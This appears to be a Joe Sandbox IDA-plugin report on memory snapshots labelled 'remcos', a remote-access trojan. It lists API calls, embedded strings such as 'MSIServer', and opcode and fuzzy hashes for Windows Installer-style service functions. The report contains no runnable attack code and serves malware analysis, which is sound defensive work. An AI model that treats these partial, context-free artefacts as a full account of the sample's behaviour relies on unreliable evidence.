                                                                                                                                  • Part of subcall function 001F59F2: GetLastError.KERNEL32(00000020,00000000,00000000), ref: 001F5A12
                                                                                                                                  • Part of subcall function 001F59F2: RegQueryValueExW.ADVAPI32(?,Debug,00000000,00000000,?,?), ref: 001F5A8A
                                                                                                                                  • Part of subcall function 001F59F2: RegCloseKey.ADVAPI32(?), ref: 001F5AAA
                                                                                                                                  • Part of subcall function 001F59F2: GlobalFree.KERNEL32(?), ref: 001F5ABF
                                                                                                                                  • Part of subcall function 001F59F2: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Installer\CA,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 001F5B14
                                                                                                                                  • Part of subcall function 001F59F2: RegSetValueExW.ADVAPI32(?,LastError,00000000,00000004,?,00000004), ref: 001F5B35
                                                                                                                                  • Part of subcall function 001F59F2: lstrlenW.KERNEL32(ServerMain (CA): Open synchronization event failed), ref: 001F5B3C
                                                                                                                                  • Part of subcall function 001F59F2: RegSetValueExW.ADVAPI32(?,LastErrorMessage,00000000,00000001,ServerMain (CA): Open synchronization event failed,00000000), ref: 001F5B59
                                                                                                                                  • Part of subcall function 001F59F2: RegCloseKey.ADVAPI32(?), ref: 001F5B65
                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00007EB0,00000000,00000000,001FC6A8), ref: 001F7E72
                                                                                                                                • GetLastError.KERNEL32(00007530), ref: 001F7E80
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                 • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLastValue$CloseCreate$CtrlFreeGlobalHandlerQueryRegisterServiceThreadlstrlen
                                                                                                                                • String ID: MSIServer$RegisterServiceCtrlHandler failed.
                                                                                                                                • API String ID: 1878216277-870239898
                                                                                                                                • Opcode ID: f5ee3d5d44723c5ada7f99b2f8dc5edc27018f188088468047aade7c5f40fdce
                                                                                                                                • Instruction ID: d62f5115d33ab4e95275d690c847b94fa365e09b7328b9a01027b933df561890
                                                                                                                                • Opcode Fuzzy Hash: f5ee3d5d44723c5ada7f99b2f8dc5edc27018f188088468047aade7c5f40fdce
                                                                                                                                • Instruction Fuzzy Hash: B301F431648229BBD32067A6BE0EE7B3E9ADB85761B000153BB09E16D1DF70CC42C6F1
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                 • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrlen
                                                                                                                                • String ID: MSIINSTANCEGUID=
                                                                                                                                • API String ID: 1659193697-2015669138
                                                                                                                                • Opcode ID: d99f7c31f6c7f24f107b20a5e72a7af6fe78adb2cf177eb367e94a42e8891cb5
                                                                                                                                • Instruction ID: bff2a7859bda90e9ca919ad19a37062116eb13b3fdd8dce1d303d09105d6def9
                                                                                                                                • Opcode Fuzzy Hash: d99f7c31f6c7f24f107b20a5e72a7af6fe78adb2cf177eb367e94a42e8891cb5
                                                                                                                                • Instruction Fuzzy Hash: 92416E36A0021C9BC710AB70ED89BBB77B5BB54364F140164FB0AE7691EF749D81CB94
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,Msi.dll,00000000,00000000,?,?,001F3B73), ref: 001F5C06
                                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryInstanceCount), ref: 001F5C18
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,001F3B73), ref: 001F5C35
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,001F3B73), ref: 001F5C42
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                 • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeLibrary$AddressHandleModuleProc
                                                                                                                                • String ID: Msi.dll$QueryInstanceCount
                                                                                                                                • API String ID: 1227796897-1207408768
                                                                                                                                • Opcode ID: 7d6d1f283556ec68c32bef073d4bff0c9a4470f49e80116721e9b5d6867b554d
                                                                                                                                • Instruction ID: 92f57a12d8836b5fefde8b5f03e52dccae9db6592e41fce102f376769db7a67f
                                                                                                                                • Opcode Fuzzy Hash: 7d6d1f283556ec68c32bef073d4bff0c9a4470f49e80116721e9b5d6867b554d
                                                                                                                                • Instruction Fuzzy Hash: 64F0543165561CFBDB105761ED09ABD7E6EEF04756F110560AA03E1160DB75CE00EA94
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                 • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrlen
                                                                                                                                • String ID: PECMS$PackageCode$REINSTALL=ALL REINSTALLMODE=%s$rpoedcamusv
                                                                                                                                • API String ID: 1659193697-1647986965
                                                                                                                                • Opcode ID: 6cea46d5e793414511ad332a1d222c978628f07aa88284e2e3a0896049199907
                                                                                                                                • Instruction ID: 59adba9cb7405b4a3ad89cbf9e2ffe18e5e2f62d23c50a06d3350a16882acdd8
                                                                                                                                • Opcode Fuzzy Hash: 6cea46d5e793414511ad332a1d222c978628f07aa88284e2e3a0896049199907
                                                                                                                                • Instruction Fuzzy Hash: 86610272608B499BD734DF64E855BBB73EAEB94350F10092AFB46C7280EB70D944C782
                                                                                                                                APIs
                                                                                                                                • EnterCriticalSection.KERNEL32(001FC838,?,?,?,001F3C1E,00000000,00000000), ref: 001F3C31
                                                                                                                                • SetServiceStatus.ADVAPI32(001FC850,?,?,?,001F3C1E,00000000,00000000), ref: 001F3CC0
                                                                                                                                • GetLastError.KERNEL32(?,?,?,001F3C1E,00000000,00000000), ref: 001F3CCC
                                                                                                                                • LeaveCriticalSection.KERNEL32(001FC838,?,?,?,001F3C1E,00000000,00000000), ref: 001F3CDF
                                                                                                                                Strings
                                                                                                                                • SetServiceStatus failed., xrefs: 001F3CD4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                 • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalSection$EnterErrorLastLeaveServiceStatus
                                                                                                                                • String ID: SetServiceStatus failed.
                                                                                                                                • API String ID: 427148986-1344523210
                                                                                                                                • Opcode ID: 860987d20826dc402fa0447227951eeadec6a659231e9be33010d7b9004298e2
                                                                                                                                • Instruction ID: 8ee0c77545709fa5afc5c03a6e614ebcad025e641ef0524aa717fbcbfc1072a0
                                                                                                                                • Opcode Fuzzy Hash: 860987d20826dc402fa0447227951eeadec6a659231e9be33010d7b9004298e2
                                                                                                                                • Instruction Fuzzy Hash: 63118F7290025CDBC7119F29EE4873977E5E7A47A1F05402BFA25A3A30C7B18D85EBD0
                                                                                                                                APIs
                                                                                                                                • GetVersion.KERNEL32(001F6E67,?), ref: 001F63A0
                                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 001F63B3
                                                                                                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 001F63C4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                 • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProcVersion
                                                                                                                                • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                • API String ID: 3310240892-3460614246
                                                                                                                                • Opcode ID: 3ae87e9f9509294909f7e754a3ba821084974da785cb36111670ca8405966a9c
                                                                                                                                • Instruction ID: 06adc378cfc5782b68d5abc234bce056ee9a2f4049655ee452227c5f21e1c3d8
                                                                                                                                • Opcode Fuzzy Hash: 3ae87e9f9509294909f7e754a3ba821084974da785cb36111670ca8405966a9c
                                                                                                                                • Instruction Fuzzy Hash: F8E08C30740229BBDA6027727C8DBBB7A4EFB10B827004011BA09E2590DB20CC81C6B0
                                                                                                                                APIs
                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 001F9B4E
                                                                                                                                • ?terminate@@YAXXZ.MSVCRT ref: 001F9BF7
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                 • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ?terminate@@CurrentImageNonwritable
                                                                                                                                • String ID: csm$csm
                                                                                                                                • API String ID: 3343398186-3733052814
                                                                                                                                • Opcode ID: 42adb0c5fbff6520401afc29dbb1921fb9da70bf540a2ab6d86685a344654734
                                                                                                                                • Instruction ID: 7f192ba832e721848a8f337fa291d3de7578aa2dc07e1e5f6c2589f87c8d3ef9
                                                                                                                                • Opcode Fuzzy Hash: 42adb0c5fbff6520401afc29dbb1921fb9da70bf540a2ab6d86685a344654734
                                                                                                                                • Instruction Fuzzy Hash: EB51AF34A0020C9BCF10EF68D884EBEBBA5AF44328F148195EA199B292D772DD55CB91
                                                                                                                                APIs
                                                                                                                                • LoadLibraryW.KERNEL32(Msi.dll), ref: 001F3D10
                                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001F3D29
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                 • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                • String ID: DllGetClassObject$Msi.dll
                                                                                                                                • API String ID: 2574300362-3279299384
                                                                                                                                • Opcode ID: c7673afea4f77bf0de94a0e9b11b247a536f2a0d69a7da646a6357c5a3b6448c
                                                                                                                                • Instruction ID: bb7fbbf39176a2ec9f520fb7cc56faa5349dbdda9589422a666a02d1b15e8455
                                                                                                                                • Opcode Fuzzy Hash: c7673afea4f77bf0de94a0e9b11b247a536f2a0d69a7da646a6357c5a3b6448c
                                                                                                                                • Instruction Fuzzy Hash: 30315E35A10218EFCB04DBA8DD54D7EB7B9FF487107010099E916E36A0DB70AE41DB90
                                                                                                                                APIs
                                                                                                                                • LoadLibraryW.KERNEL32(Msi.dll,00000000,00000000,?,?,?,001F76B2), ref: 001F3E19
                                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001F3E2E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                 • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                 • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                • String ID: DllGetClassObject$Msi.dll
                                                                                                                                • API String ID: 2574300362-3279299384
                                                                                                                                • Opcode ID: 636ce52cfbb6769504c4513d43d9f113e0c54aab7fa14e681c5a167f526139c0
                                                                                                                                • Instruction ID: 580ccf75eb5b0f9a821a14354bb2fccdeefbc1d63a993cd3c94a81c81e63daf8
                                                                                                                                • Opcode Fuzzy Hash: 636ce52cfbb6769504c4513d43d9f113e0c54aab7fa14e681c5a167f526139c0
                                                                                                                                • Instruction Fuzzy Hash: 9E115E71B50619AFDB00DB64DD48E7A77A9EF08765F004058E905E3690E730EE40DB90
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 001F8A77
                                                                                                                                • LoadLibraryW.KERNEL32(COMCTL32), ref: 001F8AA1
                                                                                                                                • GetProcAddress.KERNEL32(?), ref: 001F8AC1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryLoadProcSleep
                                                                                                                                • String ID: COMCTL32
                                                                                                                                • API String ID: 188063004-3719691325
                                                                                                                                • Opcode ID: 000a42b15d5658cd69377ddd1684402032246dd4fdf0b074942a7aa305618e59
                                                                                                                                • Instruction ID: f120e1a6301f8eba8729694c88c9e1e34e98e9f48723170437dc70de8f195ef5
                                                                                                                                • Opcode Fuzzy Hash: 000a42b15d5658cd69377ddd1684402032246dd4fdf0b074942a7aa305618e59
                                                                                                                                • Instruction Fuzzy Hash: 0401B132604219AFD719DB799D1963A7AA9EB82350F08043EE601D7250EF70DC41DBE0
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: memcpy
                                                                                                                                • String ID: `
                                                                                                                                • API String ID: 3510742995-2679148245
                                                                                                                                • Opcode ID: 22cc49c760ed817d82a9f6d9a9af561a998335de2e3d08d25fca75c9c41e2a2f
                                                                                                                                • Instruction ID: ebb5e4b197e0cda8c16af7d05924e6f1fdf56be817508bbc463e12686cfac1e9
                                                                                                                                • Opcode Fuzzy Hash: 22cc49c760ed817d82a9f6d9a9af561a998335de2e3d08d25fca75c9c41e2a2f
                                                                                                                                • Instruction Fuzzy Hash: 3A51CB72A00229EFCB24DFACC8855BAB7B5FF58310B654555FA14EB380EB71AE40C790
                                                                                                                                APIs
                                                                                                                                • lstrcmpW.KERNEL32(?,001F13CC,?,mewuifsoarpcvxgh!), ref: 001F4A83
                                                                                                                                • lstrcmpW.KERNEL32(?,001F13D0,?,mewuifsoarpcvxgh!), ref: 001F4A93
                                                                                                                                • lstrcmpW.KERNEL32(?,001F13D8,?,mewuifsoarpcvxgh!), ref: 001F4AA3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcmp
                                                                                                                                • String ID: mewuifsoarpcvxgh!
                                                                                                                                • API String ID: 1534048567-2729521250
                                                                                                                                • Opcode ID: 3d17892483e0df6188d4b6a44bd8f5112226b16af2a8b545de4fd8c48c26ee8d
                                                                                                                                • Instruction ID: 8ccf99c85deab868fbdfc063f4a5766edb9f4761d03d0080cf70922262f1ab79
                                                                                                                                • Opcode Fuzzy Hash: 3d17892483e0df6188d4b6a44bd8f5112226b16af2a8b545de4fd8c48c26ee8d
                                                                                                                                • Instruction Fuzzy Hash: BA41A332B9021DEBDB219BA5E891ABFB3B5FF44710F14402AEB42E7290E7749D81C754
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 001F9C98: GetModuleHandleW.KERNEL32(00000000), ref: 001F9C9F
                                                                                                                                • __set_app_type.MSVCRT ref: 001F9292
                                                                                                                                • __p__fmode.MSVCRT ref: 001F92A8
                                                                                                                                • __p__commode.MSVCRT ref: 001F92B6
                                                                                                                                • __setusermatherr.MSVCRT ref: 001F92D7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1632413811-0
                                                                                                                                • Opcode ID: c72cf080ea621358ab469d9f43201477d9b1fae65b4892c86c301438786dd137
                                                                                                                                • Instruction ID: 13107da6b0209236b30d55ebfe964551b50cbe7a812f9b8e0790b6897b0a6d99
                                                                                                                                • Opcode Fuzzy Hash: c72cf080ea621358ab469d9f43201477d9b1fae65b4892c86c301438786dd137
                                                                                                                                • Instruction Fuzzy Hash: BEF0157410830CDFC319BB30FD1A6383BA2BB15321B10061AE56286AF1CF3580C5EE90
                                                                                                                                APIs
                                                                                                                                • StgOpenStorage.OLE32(?,00000000,00000020,00000000,00000000,?), ref: 001F3F75
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: OpenStorage
                                                                                                                                • String ID: &
                                                                                                                                • API String ID: 222319337-1010288
                                                                                                                                • Opcode ID: 291427b56ea1d037264edd0b6bfdab6f0b9fecfdf5a80847fd8e09ada27586a6
                                                                                                                                • Instruction ID: 3b2c7a0582a5402ac01ea03e48b2cf5852f612501cebf45c5f5238942238b91f
                                                                                                                                • Opcode Fuzzy Hash: 291427b56ea1d037264edd0b6bfdab6f0b9fecfdf5a80847fd8e09ada27586a6
                                                                                                                                • Instruction Fuzzy Hash: 29910970A10218AFEB18DFA4ED99EBEB7B9FF54315B044528F516E7290DB20BD44CB50
                                                                                                                                APIs
                                                                                                                                • IsCharAlphaNumericW.USER32(?,00000000,00000104,00000000,?,?,?,?,?,001F6B65,?,?,?), ref: 001F614F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AlphaCharNumeric
                                                                                                                                • String ID: "$Property value is too long.
                                                                                                                                • API String ID: 1535711457-3969759159
                                                                                                                                • Opcode ID: b6ea7bcd2819d7b6a32a97b7cd5ec38e98df571e84d808a141d2a451cbc1f31c
                                                                                                                                • Instruction ID: 42dcf8a79000fbeadd0c6882641cdc9f0b7caa4f29e80ab8d1aa3bd704df6d51
                                                                                                                                • Opcode Fuzzy Hash: b6ea7bcd2819d7b6a32a97b7cd5ec38e98df571e84d808a141d2a451cbc1f31c
                                                                                                                                • Instruction Fuzzy Hash: F241E875E04139DBCB34EFA9844057AB3F2EFA8710B648425EAC5E7284F7358D82D7A0
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 001F88D6
                                                                                                                                • GetProcAddress.KERNEL32(?), ref: 001F891F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProcSleep
                                                                                                                                • String ID: OLE32
                                                                                                                                • API String ID: 1175476452-2276369563
                                                                                                                                • Opcode ID: ef8189b29f2b5c78738fe2bda461e4ec450c4360b9a100977527de20103848a9
                                                                                                                                • Instruction ID: 61e5caf7d7929383215b154492f423babda4ab404da2bfeb261f60bc5e75e822
                                                                                                                                • Opcode Fuzzy Hash: ef8189b29f2b5c78738fe2bda461e4ec450c4360b9a100977527de20103848a9
                                                                                                                                • Instruction Fuzzy Hash: 3C01D432604259ABDB19DB759E2A73E3AE9EB85314F04043DEA41D7250EFB0DC41C7E1
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 001F8D70
                                                                                                                                • GetProcAddress.KERNEL32(?), ref: 001F8DB9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProcSleep
                                                                                                                                • String ID: KERNEL32
                                                                                                                                • API String ID: 1175476452-1217789123
                                                                                                                                • Opcode ID: c29653a3493884a6b59467dd3a2249cf44b89c2bb21b9e8154f4c285e00557df
                                                                                                                                • Instruction ID: 08437dda18ca980eae0a104379b4670bd516fd8d7d46108dfcf626d44f0c528d
                                                                                                                                • Opcode Fuzzy Hash: c29653a3493884a6b59467dd3a2249cf44b89c2bb21b9e8154f4c285e00557df
                                                                                                                                • Instruction Fuzzy Hash: 7F01B171604258ABDB299BB9DE2977A3A99EF92314F08043EEA45D7290DF70DC41C7D0